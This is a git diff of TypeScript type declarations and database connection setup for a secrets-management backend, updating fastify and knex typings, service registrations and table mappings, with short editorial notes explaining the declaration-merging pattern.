import { TAuthSignupFactory } from "@app/services/auth/auth-signup-service";
import { ActorAuthMethod, ActorType } from "@app/services/auth/auth-type";
import { TAuthTokenServiceFactory } from "@app/services/auth-token/auth-token-service";
import { TAutomatedSecurityServiceFactory } from "@app/services/automated-security/automated-security-service";
import { TCertificateServiceFactory } from "@app/services/certificate/certificate-service";
import { TCertificateAuthorityServiceFactory } from "@app/services/certificate-authority/certificate-authority-service";
import { TInternalCertificateAuthorityServiceFactory } from "@app/services/certificate-authority/internal/internal-certificate-authority-service";
import { TCertificateTemplateServiceFactory } from "@app/services/certificate-template/certificate-template-service";
import { TCmekServiceFactory } from "@app/services/cmek/cmek-service";
import { TExternalGroupOrgRoleMappingServiceFactory } from "@app/services/external-group-org-role-mapping/external-group-org-role-mapping-service";
import { TExternalMigrationServiceFactory } from "@app/services/external-migration/external-migration-service";
import { TFolderCommitServiceFactory } from "@app/services/folder-commit/folder-commit-service";
import { TGroupProjectServiceFactory } from "@app/services/group-project/group-project-service";
import { THsmServiceFactory } from "@app/services/hsm/hsm-service";
import { TIdentityServiceFactory } from "@app/services/identity/identity-service";
import { TIdentityAccessTokenServiceFactory } from "@app/services/identity-access-token/identity-access-token-service";
import { TIdentityAliCloudAuthServiceFactory } from "@app/services/identity-alicloud-auth/identity-alicloud-auth-service";
import { TIdentityAwsAuthServiceFactory } from "@app/services/identity-aws-auth/identity-aws-auth-service";
import { TIdentityAzureAuthServiceFactory } from "@app/services/identity-azure-auth/identity-azure-auth-service";
import { TIdentityGcpAuthServiceFactory } from "@app/services/identity-gcp-auth/identity-gcp-auth-service";
import { TIdentityJwtAuthServiceFactory } from "@app/services/identity-jwt-auth/identity-jwt-auth-service";
import { TIdentityKubernetesAuthServiceFactory } from "@app/services/identity-kubernetes-auth/identity-kubernetes-auth-service";
import { TIdentityLdapAuthServiceFactory } from "@app/services/identity-ldap-auth/identity-ldap-auth-service";
import { TAllowedFields } from "@app/services/identity-ldap-auth/identity-ldap-auth-types";
import { TIdentityOciAuthServiceFactory } from "@app/services/identity-oci-auth/identity-oci-auth-service";
import { TIdentityOidcAuthServiceFactory } from "@app/services/identity-oidc-auth/identity-oidc-auth-service";
import { TIdentityProjectServiceFactory } from "@app/services/identity-project/identity-project-service";
import { TIdentityTlsCertAuthServiceFactory } from "@app/services/identity-tls-cert-auth/identity-tls-cert-auth-types";
import { TIdentityTokenAuthServiceFactory } from "@app/services/identity-token-auth/identity-token-auth-service";
import { TIdentityUaServiceFactory } from "@app/services/identity-ua/identity-ua-service";
import { TIntegrationServiceFactory } from "@app/services/integration/integration-service";
import { TIntegrationAuthServiceFactory } from "@app/services/integration-auth/integration-auth-service";
import { TMicrosoftTeamsServiceFactory } from "@app/services/microsoft-teams/microsoft-teams-service";
import { TOrgRoleServiceFactory } from "@app/services/org/org-role-service";
import { TOrgServiceFactory } from "@app/services/org/org-service";
import { TOrgAdminServiceFactory } from "@app/services/org-admin/org-admin-service";
import { TPkiAlertServiceFactory } from "@app/services/pki-alert/pki-alert-service";
import { TPkiCollectionServiceFactory } from "@app/services/pki-collection/pki-collection-service";
import { TPkiSubscriberServiceFactory } from "@app/services/pki-subscriber/pki-subscriber-service";
import { TPkiTemplatesServiceFactory } from "@app/services/pki-templates/pki-templates-service";
import { TProjectServiceFactory } from "@app/services/project/project-service";
import { TProjectBotServiceFactory } from "@app/services/project-bot/project-bot-service";
import { TProjectEnvServiceFactory } from "@app/services/project-env/project-env-service";
import { TProjectKeyServiceFactory } from "@app/services/project-key/project-key-service";
import { TProjectMembershipServiceFactory } from "@app/services/project-membership/project-membership-service";
import { TProjectRoleServiceFactory } from "@app/services/project-role/project-role-service";
import { TReminderServiceFactory } from "@app/services/reminder/reminder-types";
import { TSecretServiceFactory } from "@app/services/secret/secret-service";
import { TSecretBlindIndexServiceFactory } from "@app/services/secret-blind-index/secret-blind-index-service";
import { TSecretFolderServiceFactory } from "@app/services/secret-folder/secret-folder-service";
@@ -116,35 +100,12 @@ import { TWorkflowIntegrationServiceFactory } from "@app/services/workflow-integ
declare module "@fastify/request-context" {
interface RequestContextData {
reqId: string;
orgId?: string;
identityAuthInfo?: {
identityId: string;
oidc?: {
claims: Record<string, string>;
};
kubernetes?: {
namespace: string;
name: string;
};
aws?: {
accountId: string;
arn: string;
userId: string;
partition: string;
service: string;
resourceType: string;
resourceName: string;
};
};
identityPermissionMetadata?: Record<string, unknown>; // filled by permission service
assumedPrivilegeDetails?: { requesterId: string; actorId: string; actorType: ActorType; projectId: string };
}
}
declare module "fastify" {
interface Session {
callbackPort: string;
isAdminLogin: boolean;
}
interface FastifyRequest {
@@ -166,16 +127,8 @@ declare module "fastify" {
rateLimits: RateLimitConfiguration;
// passport data
passportUser: {
isUserCompleted: boolean;
isUserCompleted: string;
providerAuthToken: string;
externalProviderAccessToken?: string;
};
passportMachineIdentity: {
identityId: string;
user: {
uid: string;
mail?: string;
};
};
kmipUser: {
projectId: string;
@@ -184,9 +137,7 @@ declare module "fastify" {
};
auditLogInfo: Pick<TCreateAuditLogDTO, "userAgent" | "userAgentType" | "ipAddress" | "actor">;
ssoConfig: Awaited<ReturnType<TSamlConfigServiceFactory["getSaml"]>>;
ldapConfig: Awaited<ReturnType<TLdapConfigServiceFactory["getLdapCfg"]>> & {
allowedFields?: TAllowedFields[];
};
ldapConfig: Awaited<ReturnType<TLdapConfigServiceFactory["getLdapCfg"]>>;
}
interface FastifyInstance {
@@ -228,14 +179,10 @@ declare module "fastify" {
identityUa: TIdentityUaServiceFactory;
identityKubernetesAuth: TIdentityKubernetesAuthServiceFactory;
identityGcpAuth: TIdentityGcpAuthServiceFactory;
identityAliCloudAuth: TIdentityAliCloudAuthServiceFactory;
identityTlsCertAuth: TIdentityTlsCertAuthServiceFactory;
identityAwsAuth: TIdentityAwsAuthServiceFactory;
identityAzureAuth: TIdentityAzureAuthServiceFactory;
identityOciAuth: TIdentityOciAuthServiceFactory;
identityOidcAuth: TIdentityOidcAuthServiceFactory;
identityJwtAuth: TIdentityJwtAuthServiceFactory;
identityLdapAuth: TIdentityLdapAuthServiceFactory;
accessApprovalPolicy: TAccessApprovalPolicyServiceFactory;
accessApprovalRequest: TAccessApprovalRequestServiceFactory;
secretApprovalPolicy: TSecretApprovalPolicyServiceFactory;
@@ -251,13 +198,10 @@ declare module "fastify" {
certificateTemplate: TCertificateTemplateServiceFactory;
sshCertificateAuthority: TSshCertificateAuthorityServiceFactory;
sshCertificateTemplate: TSshCertificateTemplateServiceFactory;
sshHost: TSshHostServiceFactory;
sshHostGroup: TSshHostGroupServiceFactory;
certificateAuthority: TCertificateAuthorityServiceFactory;
certificateAuthorityCrl: TCertificateAuthorityCrlServiceFactory;
certificateEst: TCertificateEstServiceFactory;
pkiCollection: TPkiCollectionServiceFactory;
pkiSubscriber: TPkiSubscriberServiceFactory;
secretScanning: TSecretScanningServiceFactory;
license: TLicenseServiceFactory;
trustedIp: TTrustedIpServiceFactory;
@@ -285,17 +229,7 @@ declare module "fastify" {
secretSync: TSecretSyncServiceFactory;
kmip: TKmipServiceFactory;
kmipOperation: TKmipOperationServiceFactory;
gateway: TGatewayServiceFactory;
secretRotationV2: TSecretRotationV2ServiceFactory;
microsoftTeams: TMicrosoftTeamsServiceFactory;
assumePrivileges: TAssumePrivilegeServiceFactory;
githubOrgSync: TGithubOrgSyncServiceFactory;
folderCommit: TFolderCommitServiceFactory;
pit: TPitServiceFactory;
secretScanningV2: TSecretScanningV2ServiceFactory;
internalCertificateAuthority: TInternalCertificateAuthorityServiceFactory;
pkiTemplate: TPkiTemplatesServiceFactory;
reminder: TReminderServiceFactory;
automatedSecurity: TAutomatedSecurityServiceFactory;
};
// this is exclusive use for middlewares in which we need to inject data
// everywhere else access using service layer
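
Editor's note: the bulk of this file is declaration merging: fastify's own FastifyRequest and FastifyInstance interfaces are extended so decorations added at runtime (auth info, the service map, rate-limit config) are visible to the type checker. A minimal, self-contained illustration of the pattern with a hypothetical decoration:

import "fastify";

declare module "fastify" {
  interface FastifyRequest {
    // hypothetical decoration, for illustration only; the repo's real fields are listed above
    requestRegion?: string;
  }
}

// Elsewhere, after fastify.decorateRequest("requestRegion", ""), handlers can read
// req.requestRegion with full type safety.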

View File

@@ -6,9 +6,6 @@ import {
TAccessApprovalPoliciesApprovers,
TAccessApprovalPoliciesApproversInsert,
TAccessApprovalPoliciesApproversUpdate,
TAccessApprovalPoliciesBypassers,
TAccessApprovalPoliciesBypassersInsert,
TAccessApprovalPoliciesBypassersUpdate,
TAccessApprovalPoliciesInsert,
TAccessApprovalPoliciesUpdate,
TAccessApprovalRequests,
@@ -20,9 +17,6 @@ import {
TApiKeys,
TApiKeysInsert,
TApiKeysUpdate,
TAppConnections,
TAppConnectionsInsert,
TAppConnectionsUpdate,
TAuditLogs,
TAuditLogsInsert,
TAuditLogStreams,
@@ -35,6 +29,9 @@ import {
TAuthTokenSessionsUpdate,
TAuthTokensInsert,
TAuthTokensUpdate,
TAutomatedSecurityReports,
TAutomatedSecurityReportsInsert,
TAutomatedSecurityReportsUpdate,
TBackupPrivateKey,
TBackupPrivateKeyInsert,
TBackupPrivateKeyUpdate,
@@ -71,45 +68,15 @@ import {
TDynamicSecrets,
TDynamicSecretsInsert,
TDynamicSecretsUpdate,
TExternalCertificateAuthorities,
TExternalCertificateAuthoritiesInsert,
TExternalCertificateAuthoritiesUpdate,
TExternalGroupOrgRoleMappings,
TExternalGroupOrgRoleMappingsInsert,
TExternalGroupOrgRoleMappingsUpdate,
TExternalKms,
TExternalKmsInsert,
TExternalKmsUpdate,
TFolderCheckpointResources,
TFolderCheckpointResourcesInsert,
TFolderCheckpointResourcesUpdate,
TFolderCheckpoints,
TFolderCheckpointsInsert,
TFolderCheckpointsUpdate,
TFolderCommitChanges,
TFolderCommitChangesInsert,
TFolderCommitChangesUpdate,
TFolderCommits,
TFolderCommitsInsert,
TFolderCommitsUpdate,
TFolderTreeCheckpointResources,
TFolderTreeCheckpointResourcesInsert,
TFolderTreeCheckpointResourcesUpdate,
TFolderTreeCheckpoints,
TFolderTreeCheckpointsInsert,
TFolderTreeCheckpointsUpdate,
TGateways,
TGatewaysInsert,
TGatewaysUpdate,
TGitAppInstallSessions,
TGitAppInstallSessionsInsert,
TGitAppInstallSessionsUpdate,
TGitAppOrg,
TGitAppOrgInsert,
TGitAppOrgUpdate,
TGithubOrgSyncConfigs,
TGithubOrgSyncConfigsInsert,
TGithubOrgSyncConfigsUpdate,
TGroupProjectMembershipRoles,
TGroupProjectMembershipRolesInsert,
TGroupProjectMembershipRolesUpdate,
@@ -125,9 +92,6 @@ import {
TIdentityAccessTokens,
TIdentityAccessTokensInsert,
TIdentityAccessTokensUpdate,
TIdentityAlicloudAuths,
TIdentityAlicloudAuthsInsert,
TIdentityAlicloudAuthsUpdate,
TIdentityAwsAuths,
TIdentityAwsAuthsInsert,
TIdentityAwsAuthsUpdate,
@@ -146,15 +110,15 @@ import {
TIdentityMetadata,
TIdentityMetadataInsert,
TIdentityMetadataUpdate,
TIdentityOciAuths,
TIdentityOciAuthsInsert,
TIdentityOciAuthsUpdate,
TIdentityOidcAuths,
TIdentityOidcAuthsInsert,
TIdentityOidcAuthsUpdate,
TIdentityOrgMemberships,
TIdentityOrgMembershipsInsert,
TIdentityOrgMembershipsUpdate,
TIdentityProfile,
TIdentityProfileInsert,
TIdentityProfileUpdate,
TIdentityProjectAdditionalPrivilege,
TIdentityProjectAdditionalPrivilegeInsert,
TIdentityProjectAdditionalPrivilegeUpdate,
@@ -164,9 +128,6 @@ import {
TIdentityProjectMemberships,
TIdentityProjectMembershipsInsert,
TIdentityProjectMembershipsUpdate,
TIdentityTlsCertAuths,
TIdentityTlsCertAuthsInsert,
TIdentityTlsCertAuthsUpdate,
TIdentityTokenAuths,
TIdentityTokenAuthsInsert,
TIdentityTokenAuthsUpdate,
@@ -185,9 +146,6 @@ import {
TIntegrations,
TIntegrationsInsert,
TIntegrationsUpdate,
TInternalCertificateAuthorities,
TInternalCertificateAuthoritiesInsert,
TInternalCertificateAuthoritiesUpdate,
TInternalKms,
TInternalKmsInsert,
TInternalKmsUpdate,
@@ -227,9 +185,6 @@ import {
TOrgBots,
TOrgBotsInsert,
TOrgBotsUpdate,
TOrgGatewayConfig,
TOrgGatewayConfigInsert,
TOrgGatewayConfigUpdate,
TOrgMemberships,
TOrgMembershipsInsert,
TOrgMembershipsUpdate,
@@ -245,18 +200,12 @@ import {
TPkiCollections,
TPkiCollectionsInsert,
TPkiCollectionsUpdate,
TPkiSubscribers,
TPkiSubscribersInsert,
TPkiSubscribersUpdate,
TProjectBots,
TProjectBotsInsert,
TProjectBotsUpdate,
TProjectEnvironments,
TProjectEnvironmentsInsert,
TProjectEnvironmentsUpdate,
TProjectGateways,
TProjectGatewaysInsert,
TProjectGatewaysUpdate,
TProjectKeys,
TProjectKeysInsert,
TProjectKeysUpdate,
@@ -274,9 +223,6 @@ import {
TProjectSplitBackfillIds,
TProjectSplitBackfillIdsInsert,
TProjectSplitBackfillIdsUpdate,
TProjectSshConfigs,
TProjectSshConfigsInsert,
TProjectSshConfigsUpdate,
TProjectsUpdate,
TProjectTemplates,
TProjectTemplatesInsert,
@@ -303,9 +249,6 @@ import {
TSecretApprovalPoliciesApprovers,
TSecretApprovalPoliciesApproversInsert,
TSecretApprovalPoliciesApproversUpdate,
TSecretApprovalPoliciesBypassers,
TSecretApprovalPoliciesBypassersInsert,
TSecretApprovalPoliciesBypassersUpdate,
TSecretApprovalPoliciesInsert,
TSecretApprovalPoliciesUpdate,
TSecretApprovalRequests,
@@ -353,31 +296,10 @@ import {
TSecretRotations,
TSecretRotationsInsert,
TSecretRotationsUpdate,
TSecretRotationsV2,
TSecretRotationsV2Insert,
TSecretRotationsV2Update,
TSecretRotationV2SecretMappings,
TSecretRotationV2SecretMappingsInsert,
TSecretRotationV2SecretMappingsUpdate,
TSecrets,
TSecretScanningConfigs,
TSecretScanningConfigsInsert,
TSecretScanningConfigsUpdate,
TSecretScanningDataSources,
TSecretScanningDataSourcesInsert,
TSecretScanningDataSourcesUpdate,
TSecretScanningFindings,
TSecretScanningFindingsInsert,
TSecretScanningFindingsUpdate,
TSecretScanningGitRisks,
TSecretScanningGitRisksInsert,
TSecretScanningGitRisksUpdate,
TSecretScanningResources,
TSecretScanningResourcesInsert,
TSecretScanningResourcesUpdate,
TSecretScanningScans,
TSecretScanningScansInsert,
TSecretScanningScansUpdate,
TSecretSharing,
TSecretSharingInsert,
TSecretSharingUpdate,
@@ -395,27 +317,15 @@ import {
TSecretSnapshotsInsert,
TSecretSnapshotsUpdate,
TSecretsUpdate,
TSecretsV2,
TSecretsV2Insert,
TSecretsV2Update,
TSecretSyncs,
TSecretSyncsInsert,
TSecretSyncsUpdate,
TSecretTagJunction,
TSecretTagJunctionInsert,
TSecretTagJunctionUpdate,
TSecretTags,
TSecretTagsInsert,
TSecretTagsUpdate,
TSecretV2TagJunction,
TSecretV2TagJunctionInsert,
TSecretV2TagJunctionUpdate,
TSecretVersions,
TSecretVersionsInsert,
TSecretVersionsUpdate,
TSecretVersionsV2,
TSecretVersionsV2Insert,
TSecretVersionsV2Update,
TSecretVersionTagJunction,
TSecretVersionTagJunctionInsert,
TSecretVersionTagJunctionUpdate,
@@ -443,21 +353,6 @@ import {
TSshCertificateTemplates,
TSshCertificateTemplatesInsert,
TSshCertificateTemplatesUpdate,
TSshHostGroupMemberships,
TSshHostGroupMembershipsInsert,
TSshHostGroupMembershipsUpdate,
TSshHostGroups,
TSshHostGroupsInsert,
TSshHostGroupsUpdate,
TSshHostLoginUserMappings,
TSshHostLoginUserMappingsInsert,
TSshHostLoginUserMappingsUpdate,
TSshHostLoginUsers,
TSshHostLoginUsersInsert,
TSshHostLoginUsersUpdate,
TSshHosts,
TSshHostsInsert,
TSshHostsUpdate,
TSuperAdmin,
TSuperAdminInsert,
TSuperAdminUpdate,
@@ -489,42 +384,24 @@ import {
TWorkflowIntegrationsInsert,
TWorkflowIntegrationsUpdate
} from "@app/db/schemas";
import { TAppConnections, TAppConnectionsInsert, TAppConnectionsUpdate } from "@app/db/schemas/app-connections";
import {
TAccessApprovalPoliciesEnvironments,
TAccessApprovalPoliciesEnvironmentsInsert,
TAccessApprovalPoliciesEnvironmentsUpdate
} from "@app/db/schemas/access-approval-policies-environments";
TExternalGroupOrgRoleMappings,
TExternalGroupOrgRoleMappingsInsert,
TExternalGroupOrgRoleMappingsUpdate
} from "@app/db/schemas/external-group-org-role-mappings";
import { TSecretSyncs, TSecretSyncsInsert, TSecretSyncsUpdate } from "@app/db/schemas/secret-syncs";
import {
TIdentityLdapAuths,
TIdentityLdapAuthsInsert,
TIdentityLdapAuthsUpdate
} from "@app/db/schemas/identity-ldap-auths";
TSecretV2TagJunction,
TSecretV2TagJunctionInsert,
TSecretV2TagJunctionUpdate
} from "@app/db/schemas/secret-v2-tag-junction";
import {
TMicrosoftTeamsIntegrations,
TMicrosoftTeamsIntegrationsInsert,
TMicrosoftTeamsIntegrationsUpdate
} from "@app/db/schemas/microsoft-teams-integrations";
import {
TProjectMicrosoftTeamsConfigs,
TProjectMicrosoftTeamsConfigsInsert,
TProjectMicrosoftTeamsConfigsUpdate
} from "@app/db/schemas/project-microsoft-teams-configs";
import { TReminders, TRemindersInsert, TRemindersUpdate } from "@app/db/schemas/reminders";
import {
TRemindersRecipients,
TRemindersRecipientsInsert,
TRemindersRecipientsUpdate
} from "@app/db/schemas/reminders-recipients";
import {
TSecretApprovalPoliciesEnvironments,
TSecretApprovalPoliciesEnvironmentsInsert,
TSecretApprovalPoliciesEnvironmentsUpdate
} from "@app/db/schemas/secret-approval-policies-environments";
import {
TSecretReminderRecipients,
TSecretReminderRecipientsInsert,
TSecretReminderRecipientsUpdate
} from "@app/db/schemas/secret-reminder-recipients";
TSecretVersionsV2,
TSecretVersionsV2Insert,
TSecretVersionsV2Update
} from "@app/db/schemas/secret-versions-v2";
import { TSecretsV2, TSecretsV2Insert, TSecretsV2Update } from "@app/db/schemas/secrets-v2";
declare module "knex" {
namespace Knex {
@@ -539,17 +416,6 @@ declare module "knex/types/tables" {
interface Tables {
[TableName.Users]: KnexOriginal.CompositeTableType<TUsers, TUsersInsert, TUsersUpdate>;
[TableName.Groups]: KnexOriginal.CompositeTableType<TGroups, TGroupsInsert, TGroupsUpdate>;
[TableName.SshHostGroup]: KnexOriginal.CompositeTableType<
TSshHostGroups,
TSshHostGroupsInsert,
TSshHostGroupsUpdate
>;
[TableName.SshHostGroupMembership]: KnexOriginal.CompositeTableType<
TSshHostGroupMemberships,
TSshHostGroupMembershipsInsert,
TSshHostGroupMembershipsUpdate
>;
[TableName.SshHost]: KnexOriginal.CompositeTableType<TSshHosts, TSshHostsInsert, TSshHostsUpdate>;
[TableName.SshCertificateAuthority]: KnexOriginal.CompositeTableType<
TSshCertificateAuthorities,
TSshCertificateAuthoritiesInsert,
@@ -575,16 +441,6 @@ declare module "knex/types/tables" {
TSshCertificateBodiesInsert,
TSshCertificateBodiesUpdate
>;
[TableName.SshHostLoginUser]: KnexOriginal.CompositeTableType<
TSshHostLoginUsers,
TSshHostLoginUsersInsert,
TSshHostLoginUsersUpdate
>;
[TableName.SshHostLoginUserMapping]: KnexOriginal.CompositeTableType<
TSshHostLoginUserMappings,
TSshHostLoginUserMappingsInsert,
TSshHostLoginUserMappingsUpdate
>;
[TableName.CertificateAuthority]: KnexOriginal.CompositeTableType<
TCertificateAuthorities,
TCertificateAuthoritiesInsert,
@@ -605,16 +461,6 @@ declare module "knex/types/tables" {
TCertificateAuthorityCrlInsert,
TCertificateAuthorityCrlUpdate
>;
[TableName.InternalCertificateAuthority]: KnexOriginal.CompositeTableType<
TInternalCertificateAuthorities,
TInternalCertificateAuthoritiesInsert,
TInternalCertificateAuthoritiesUpdate
>;
[TableName.ExternalCertificateAuthority]: KnexOriginal.CompositeTableType<
TExternalCertificateAuthorities,
TExternalCertificateAuthoritiesInsert,
TExternalCertificateAuthoritiesUpdate
>;
[TableName.Certificate]: KnexOriginal.CompositeTableType<TCertificates, TCertificatesInsert, TCertificatesUpdate>;
[TableName.CertificateTemplate]: KnexOriginal.CompositeTableType<
TCertificateTemplates,
@@ -647,11 +493,6 @@ declare module "knex/types/tables" {
TPkiCollectionItemsInsert,
TPkiCollectionItemsUpdate
>;
[TableName.PkiSubscriber]: KnexOriginal.CompositeTableType<
TPkiSubscribers,
TPkiSubscribersInsert,
TPkiSubscribersUpdate
>;
[TableName.UserGroupMembership]: KnexOriginal.CompositeTableType<
TUserGroupMembership,
TUserGroupMembershipInsert,
@@ -704,11 +545,6 @@ declare module "knex/types/tables" {
[TableName.SuperAdmin]: KnexOriginal.CompositeTableType<TSuperAdmin, TSuperAdminInsert, TSuperAdminUpdate>;
[TableName.ApiKey]: KnexOriginal.CompositeTableType<TApiKeys, TApiKeysInsert, TApiKeysUpdate>;
[TableName.Project]: KnexOriginal.CompositeTableType<TProjects, TProjectsInsert, TProjectsUpdate>;
[TableName.ProjectSshConfig]: KnexOriginal.CompositeTableType<
TProjectSshConfigs,
TProjectSshConfigsInsert,
TProjectSshConfigsUpdate
>;
[TableName.ProjectMembership]: KnexOriginal.CompositeTableType<
TProjectMemberships,
TProjectMembershipsInsert,
@@ -808,16 +644,6 @@ declare module "knex/types/tables" {
TIdentityGcpAuthsInsert,
TIdentityGcpAuthsUpdate
>;
[TableName.IdentityAliCloudAuth]: KnexOriginal.CompositeTableType<
TIdentityAlicloudAuths,
TIdentityAlicloudAuthsInsert,
TIdentityAlicloudAuthsUpdate
>;
[TableName.IdentityTlsCertAuth]: KnexOriginal.CompositeTableType<
TIdentityTlsCertAuths,
TIdentityTlsCertAuthsInsert,
TIdentityTlsCertAuthsUpdate
>;
[TableName.IdentityAwsAuth]: KnexOriginal.CompositeTableType<
TIdentityAwsAuths,
TIdentityAwsAuthsInsert,
@@ -828,11 +654,6 @@ declare module "knex/types/tables" {
TIdentityAzureAuthsInsert,
TIdentityAzureAuthsUpdate
>;
[TableName.IdentityOciAuth]: KnexOriginal.CompositeTableType<
TIdentityOciAuths,
TIdentityOciAuthsInsert,
TIdentityOciAuthsUpdate
>;
[TableName.IdentityOidcAuth]: KnexOriginal.CompositeTableType<
TIdentityOidcAuths,
TIdentityOidcAuthsInsert,
@@ -843,11 +664,6 @@ declare module "knex/types/tables" {
TIdentityJwtAuthsInsert,
TIdentityJwtAuthsUpdate
>;
[TableName.IdentityLdapAuth]: KnexOriginal.CompositeTableType<
TIdentityLdapAuths,
TIdentityLdapAuthsInsert,
TIdentityLdapAuthsUpdate
>;
[TableName.IdentityUaClientSecret]: KnexOriginal.CompositeTableType<
TIdentityUaClientSecrets,
TIdentityUaClientSecretsInsert,
@@ -891,18 +707,6 @@ declare module "knex/types/tables" {
TAccessApprovalPoliciesApproversUpdate
>;
[TableName.AccessApprovalPolicyBypasser]: KnexOriginal.CompositeTableType<
TAccessApprovalPoliciesBypassers,
TAccessApprovalPoliciesBypassersInsert,
TAccessApprovalPoliciesBypassersUpdate
>;
[TableName.AccessApprovalPolicyEnvironment]: KnexOriginal.CompositeTableType<
TAccessApprovalPoliciesEnvironments,
TAccessApprovalPoliciesEnvironmentsInsert,
TAccessApprovalPoliciesEnvironmentsUpdate
>;
[TableName.AccessApprovalRequest]: KnexOriginal.CompositeTableType<
TAccessApprovalRequests,
TAccessApprovalRequestsInsert,
@@ -926,11 +730,6 @@ declare module "knex/types/tables" {
TSecretApprovalPoliciesApproversInsert,
TSecretApprovalPoliciesApproversUpdate
>;
[TableName.SecretApprovalPolicyBypasser]: KnexOriginal.CompositeTableType<
TSecretApprovalPoliciesBypassers,
TSecretApprovalPoliciesBypassersInsert,
TSecretApprovalPoliciesBypassersUpdate
>;
[TableName.SecretApprovalRequest]: KnexOriginal.CompositeTableType<
TSecretApprovalRequests,
TSecretApprovalRequestsInsert,
@@ -951,11 +750,6 @@ declare module "knex/types/tables" {
TSecretApprovalRequestSecretTagsInsert,
TSecretApprovalRequestSecretTagsUpdate
>;
[TableName.SecretApprovalPolicyEnvironment]: KnexOriginal.CompositeTableType<
TSecretApprovalPoliciesEnvironments,
TSecretApprovalPoliciesEnvironmentsInsert,
TSecretApprovalPoliciesEnvironmentsUpdate
>;
[TableName.SecretRotation]: KnexOriginal.CompositeTableType<
TSecretRotations,
TSecretRotationsInsert,
@@ -1142,107 +936,15 @@ declare module "knex/types/tables" {
TKmipClientCertificatesInsert,
TKmipClientCertificatesUpdate
>;
[TableName.Gateway]: KnexOriginal.CompositeTableType<TGateways, TGatewaysInsert, TGatewaysUpdate>;
[TableName.ProjectGateway]: KnexOriginal.CompositeTableType<
TProjectGateways,
TProjectGatewaysInsert,
TProjectGatewaysUpdate
[TableName.IdentityProfile]: KnexOriginal.CompositeTableType<
TIdentityProfile,
TIdentityProfileInsert,
TIdentityProfileUpdate
>;
[TableName.OrgGatewayConfig]: KnexOriginal.CompositeTableType<
TOrgGatewayConfig,
TOrgGatewayConfigInsert,
TOrgGatewayConfigUpdate
>;
[TableName.SecretRotationV2]: KnexOriginal.CompositeTableType<
TSecretRotationsV2,
TSecretRotationsV2Insert,
TSecretRotationsV2Update
>;
[TableName.SecretRotationV2SecretMapping]: KnexOriginal.CompositeTableType<
TSecretRotationV2SecretMappings,
TSecretRotationV2SecretMappingsInsert,
TSecretRotationV2SecretMappingsUpdate
>;
[TableName.MicrosoftTeamsIntegrations]: KnexOriginal.CompositeTableType<
TMicrosoftTeamsIntegrations,
TMicrosoftTeamsIntegrationsInsert,
TMicrosoftTeamsIntegrationsUpdate
>;
[TableName.ProjectMicrosoftTeamsConfigs]: KnexOriginal.CompositeTableType<
TProjectMicrosoftTeamsConfigs,
TProjectMicrosoftTeamsConfigsInsert,
TProjectMicrosoftTeamsConfigsUpdate
>;
[TableName.SecretReminderRecipients]: KnexOriginal.CompositeTableType<
TSecretReminderRecipients,
TSecretReminderRecipientsInsert,
TSecretReminderRecipientsUpdate
>;
[TableName.GithubOrgSyncConfig]: KnexOriginal.CompositeTableType<
TGithubOrgSyncConfigs,
TGithubOrgSyncConfigsInsert,
TGithubOrgSyncConfigsUpdate
>;
[TableName.FolderCommit]: KnexOriginal.CompositeTableType<
TFolderCommits,
TFolderCommitsInsert,
TFolderCommitsUpdate
>;
[TableName.FolderCommitChanges]: KnexOriginal.CompositeTableType<
TFolderCommitChanges,
TFolderCommitChangesInsert,
TFolderCommitChangesUpdate
>;
[TableName.FolderCheckpoint]: KnexOriginal.CompositeTableType<
TFolderCheckpoints,
TFolderCheckpointsInsert,
TFolderCheckpointsUpdate
>;
[TableName.FolderCheckpointResources]: KnexOriginal.CompositeTableType<
TFolderCheckpointResources,
TFolderCheckpointResourcesInsert,
TFolderCheckpointResourcesUpdate
>;
[TableName.FolderTreeCheckpoint]: KnexOriginal.CompositeTableType<
TFolderTreeCheckpoints,
TFolderTreeCheckpointsInsert,
TFolderTreeCheckpointsUpdate
>;
[TableName.FolderTreeCheckpointResources]: KnexOriginal.CompositeTableType<
TFolderTreeCheckpointResources,
TFolderTreeCheckpointResourcesInsert,
TFolderTreeCheckpointResourcesUpdate
>;
[TableName.SecretScanningDataSource]: KnexOriginal.CompositeTableType<
TSecretScanningDataSources,
TSecretScanningDataSourcesInsert,
TSecretScanningDataSourcesUpdate
>;
[TableName.SecretScanningResource]: KnexOriginal.CompositeTableType<
TSecretScanningResources,
TSecretScanningResourcesInsert,
TSecretScanningResourcesUpdate
>;
[TableName.SecretScanningScan]: KnexOriginal.CompositeTableType<
TSecretScanningScans,
TSecretScanningScansInsert,
TSecretScanningScansUpdate
>;
[TableName.SecretScanningFinding]: KnexOriginal.CompositeTableType<
TSecretScanningFindings,
TSecretScanningFindingsInsert,
TSecretScanningFindingsUpdate
>;
[TableName.SecretScanningConfig]: KnexOriginal.CompositeTableType<
TSecretScanningConfigs,
TSecretScanningConfigsInsert,
TSecretScanningConfigsUpdate
>;
[TableName.Reminder]: KnexOriginal.CompositeTableType<TReminders, TRemindersInsert, TRemindersUpdate>;
[TableName.ReminderRecipient]: KnexOriginal.CompositeTableType<
TRemindersRecipients,
TRemindersRecipientsInsert,
TRemindersRecipientsUpdate
[TableName.AutomatedSecurityReports]: KnexOriginal.CompositeTableType<
TAutomatedSecurityReports,
TAutomatedSecurityReportsInsert,
TAutomatedSecurityReportsUpdate
>;
}
}
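
Editor's note: every entry in this Tables map binds a table name to a Knex.CompositeTableType, which lets knex use distinct row, insert, and update shapes for the same table. A self-contained sketch with a made-up table (names are illustrative, not from this diff):

import { Knex } from "knex";

interface UserRow {
  id: string;
  email: string;
  createdAt: Date;
}
type UserInsert = Omit<UserRow, "id" | "createdAt">;
type UserUpdate = Partial<UserInsert>;

declare module "knex/types/tables" {
  interface Tables {
    // selects return UserRow, .insert() accepts UserInsert, .update() accepts UserUpdate
    users_example: Knex.CompositeTableType<UserRow, UserInsert, UserUpdate>;
  }
}

export const findByEmail = (db: Knex, email: string) =>
  db("users_example").where({ email }).first();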

View File

@@ -1,6 +1,6 @@
import knex, { Knex } from "knex";
export type TDbClient = Knex;
export type TDbClient = ReturnType<typeof initDbConnection>;
export const initDbConnection = ({
dbConnectionUri,
dbRootCert,
@@ -50,8 +50,6 @@ export const initDbConnection = ({
}
: false
},
// https://knexjs.org/guide/#pool
pool: { min: 0, max: 10 },
migrations: {
tableName: "infisical_migrations"
}
@@ -72,8 +70,7 @@ export const initDbConnection = ({
},
migrations: {
tableName: "infisical_migrations"
},
pool: { min: 0, max: 10 }
}
});
});
@@ -110,8 +107,7 @@ export const initAuditLogDbConnection = ({
},
migrations: {
tableName: "infisical_migrations"
},
pool: { min: 0, max: 10 }
}
});
